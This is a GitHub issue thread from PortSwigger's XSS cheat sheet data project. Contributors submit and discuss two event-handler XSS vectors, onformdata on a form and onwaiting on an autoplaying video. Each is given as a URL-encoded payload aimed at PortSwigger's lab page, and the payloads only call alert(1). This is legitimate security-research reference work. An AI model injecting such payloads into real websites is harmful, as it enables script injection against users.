### ISSUE TITLE
Add onformdata - requires user interaction

### ISSUE THREAD

**Issue by hansmach1ne** [PortSwigger/xss-cheatsheet-data#56]
Works in most browsers

`https://portswigger-labs.net/xss/xss.php?context=html&x=%3Cform%20onformdata=%22alert(1)%22%3E%3Ca%3E%3Cbutton%20type=%22submit%22%3EClickMe%3C/button%3E`

**Comment by hackvertor** [comment]
Thanks yep I missed that too

**Comment by hansmach1ne** [comment]
@hackvertor No problem, hey noticed that onwaiting is also not there, but it's mentioned in the README.md of this repo :D

**Comment by hackvertor** [comment]
Thanks for the submission! This will be included on the cheat sheet shortly.

**Comment by hansmach1ne** [comment]
@hackvertor Did a bit of more digging, we can abuse `onwaiting`. It will fire once the video finishes, the user will then have to click on the play button, or anywhere on the video. The idea is to create a very short video, that way it will be more likely that the handler will trigger. Adding `autoplay` attribute with `muted` (so that browser don't complain and video should be started automatically).


`https://portswigger-labs.net/xss/xss.php?x=%3Cvideo%20width=%222222%22%20height=%222222%22%20controls%20autoplay%20muted%20onwaiting=%22alert(1)%22%3E%20%3Csource%20src=%22https://github.com/PortSwigger/xss-cheatsheet-data/assets/57464251/3eaf295a-01d7-4c3b-af01-8bbb41641dba%22%20type=%22video/mp4%22%3E%3C/video%3E&context=html`

**Comment by hackvertor** [comment]
Yeah that's a little better but requires user interaction. I'll raise another ticket to track this.
